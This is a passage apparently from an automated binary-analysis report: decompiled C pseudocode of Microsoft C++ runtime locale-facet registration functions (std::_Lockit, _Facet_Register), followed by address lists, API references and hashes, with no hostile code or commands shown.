				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDEBFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDEC050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDEC0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDEC120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDEC1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDEC229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDEC295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDED028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB803
int.LIBCPMT ref: 6DDEB81A

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDEB83D
std::_Facet_Register.LIBCPMT ref: 6DDEB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB892

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: bf841992b082cff0bcc271d13ee064181710c761854fd02a6358ab93e298445d
Instruction ID: 3d5c7db72d894c78826fa1c962fb8e402ba071d8a6e8d0ec7e81751fc1f3d6f5
Opcode Fuzzy Hash: bf841992b082cff0bcc271d13ee064181710c761854fd02a6358ab93e298445d
Instruction Fuzzy Hash: D5119E75808229DBCF05FBA4C880ABDB7B5AF44718F274019F511AB390DF75AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t374 - 0x14, 0);
				_t357 =  *0x6de96e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6DDB161C(0x6de96e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6DDD66BA(_t374 - 0x14);
					return E6DDF0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6DDEBF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t374 - 0x20);
							E6DDF3D74(_t374 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t348, _t357, 0x14);
							E6DDD6653(_t374 - 0x14, 0);
							_t358 =  *0x6de96e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6DDB161C(0x6de96e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6DDD66BA(_t374 - 0x14);
								return E6DDF0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6DDEBFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t374 - 0x20);
										E6DDF3D74(_t374 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t265, _t349, _t358, 0x14);
										E6DDD6653(_t374 - 0x14, 0);
										_t359 =  *0x6de96e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6DDB161C(0x6de96e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6DDD66BA(_t374 - 0x14);
											return E6DDF0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6DDEC050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t374 - 0x20);
													E6DDF3D74(_t374 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t265, _t350, _t359, 0x14);
													E6DDD6653(_t374 - 0x14, 0);
													_t360 =  *0x6de96e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6DDB161C(0x6de96e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6DDD66BA(_t374 - 0x14);
														return E6DDF0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6DDEC0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t374 - 0x20);
																E6DDF3D74(_t374 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t265, _t351, _t360, 0x14);
																E6DDD6653(_t374 - 0x14, 0);
																_t361 =  *0x6de96e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6DDB161C(0x6de96e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6DDD66BA(_t374 - 0x14);
																	return E6DDF0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6DDEC120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t374 - 0x20);
																			E6DDF3D74(_t374 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t265, _t352, _t361, 0x14);
																			E6DDD6653(_t374 - 0x14, 0);
																			_t362 =  *0x6de96e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6DDB161C(0x6de96e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6DDD66BA(_t374 - 0x14);
																				return E6DDF0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6DDEC1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t374 - 0x20);
																						E6DDF3D74(_t374 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t265, _t353, _t362, 0x14);
																						E6DDD6653(_t374 - 0x14, 0);
																						_t363 =  *0x6de96e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6DDB161C(0x6de96e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6DDD66BA(_t374 - 0x14);
																							return E6DDF0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6DDEC229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t374 - 0x20);
																									E6DDF3D74(_t374 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t265, _t354, _t363, 0x14);
																									E6DDD6653(_t374 - 0x14, 0);
																									_t364 =  *0x6de96e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6DDB161C(0x6de96e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6DDD66BA(_t374 - 0x14);
																										return E6DDF0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6DDEC295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6DDB1438(_t321);
																												E6DDF3D74(_t374 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de3851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6de3c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6DDED028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6DDF0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6DDD6FD3(__eflags, _t355);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6de96e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6DDD6FD3(__eflags, _t354);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6de96e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6DDD6FD3(__eflags, _t353);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6de96e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6DDD6FD3(__eflags, _t352);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6de96e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6DDD6FD3(__eflags, _t351);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6de96e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6DDD6FD3(__eflags, _t350);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6de96e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6DDD6FD3(__eflags, _t349);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6de96e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6DDD6FD3(__eflags, _t348);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6de96e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6ddeb74c
0x6ddeb74c
0x6ddeb753
0x6ddeb75d
0x6ddeb762
0x6ddeb76d
0x6ddeb771
0x6ddeb774
0x6ddeb779
0x6ddeb77d
0x6ddeb782
0x6ddeb786
0x6ddeb7cb
0x6ddeb7ce
0x6ddeb7da
0x6ddeb788
0x6ddeb78a
0x6ddeb790
0x6ddeb796
0x6ddeb79e
0x6ddeb7a1
0x6ddeb7de
0x6ddeb7ec
0x6ddeb7f1
0x6ddeb7f9
0x6ddeb803
0x6ddeb808
0x6ddeb813
0x6ddeb817
0x6ddeb81a
0x6ddeb81f
0x6ddeb828
0x6ddeb82a
0x6ddeb82c
0x6ddeb871
0x6ddeb874
0x6ddeb880
0x6ddeb82e
0x6ddeb82e
0x6ddeb830
0x6ddeb836
0x6ddeb83c
0x6ddeb844
0x6ddeb847
0x6ddeb884
0x6ddeb892
0x6ddeb897
0x6ddeb89f
0x6ddeb8a9
0x6ddeb8ae
0x6ddeb8b9
0x6ddeb8bd
0x6ddeb8c0
0x6ddeb8c5
0x6ddeb8ce
0x6ddeb8d0
0x6ddeb8d2
0x6ddeb917
0x6ddeb91a
0x6ddeb926
0x6ddeb8d4
0x6ddeb8d4
0x6ddeb8d6
0x6ddeb8dc
0x6ddeb8e2
0x6ddeb8ea
0x6ddeb8ed
0x6ddeb92a
0x6ddeb938
0x6ddeb93d
0x6ddeb945
0x6ddeb94f
0x6ddeb954
0x6ddeb95f
0x6ddeb963
0x6ddeb966
0x6ddeb96b
0x6ddeb974
0x6ddeb976
0x6ddeb978
0x6ddeb9bd
0x6ddeb9c0
0x6ddeb9cc
0x6ddeb97a
0x6ddeb97a
0x6ddeb97c
0x6ddeb982
0x6ddeb988
0x6ddeb990
0x6ddeb993
0x6ddeb9d0
0x6ddeb9de
0x6ddeb9e3
0x6ddeb9eb
0x6ddeb9f5
0x6ddeb9fa
0x6ddeba05
0x6ddeba09
0x6ddeba0c
0x6ddeba11
0x6ddeba1a
0x6ddeba1c
0x6ddeba1e
0x6ddeba63
0x6ddeba66
0x6ddeba72
0x6ddeba20
0x6ddeba20
0x6ddeba22
0x6ddeba28
0x6ddeba2e
0x6ddeba36
0x6ddeba39
0x6ddeba76
0x6ddeba84
0x6ddeba89
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebac0
0x6ddebac2
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8
0x6ddeba3b
0x6ddeba3b
0x6ddeba3e
0x6ddeba42
0x6ddeba46
0x6ddeba53
0x6ddeba5b
0x6ddeba5d
0x00000000
0x6ddeba5d
0x6ddeba24
0x6ddeba24
0x00000000
0x6ddeba24
0x6ddeba22
0x6ddeb995
0x6ddeb995
0x6ddeb998
0x6ddeb99c
0x6ddeb9a0
0x6ddeb9ad
0x6ddeb9b5
0x6ddeb9b7
0x00000000
0x6ddeb9b7
0x6ddeb97e
0x6ddeb97e
0x00000000
0x6ddeb97e
0x6ddeb97c
0x6ddeb8ef
0x6ddeb8ef
0x6ddeb8f2
0x6ddeb8f6
0x6ddeb8fa
0x6ddeb907
0x6ddeb90f
0x6ddeb911
0x00000000
0x6ddeb911
0x6ddeb8d8
0x6ddeb8d8
0x00000000
0x6ddeb8d8
0x6ddeb8d6
0x6ddeb849
0x6ddeb849
0x6ddeb84c
0x6ddeb850
0x6ddeb854
0x6ddeb861
0x6ddeb869
0x6ddeb86b
0x00000000
0x6ddeb86b
0x6ddeb832
0x6ddeb832
0x00000000
0x6ddeb832
0x6ddeb830
0x6ddeb7a3
0x6ddeb7a3
0x6ddeb7a6
0x6ddeb7aa
0x6ddeb7ae
0x6ddeb7bb
0x6ddeb7c3
0x6ddeb7c5
0x00000000
0x6ddeb7c5
0x6ddeb78c
0x6ddeb78c
0x00000000
0x6ddeb78c
0x6ddeb78a

APIs

__EH_prolog3.LIBCMT ref: 6DDEB753
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB75D
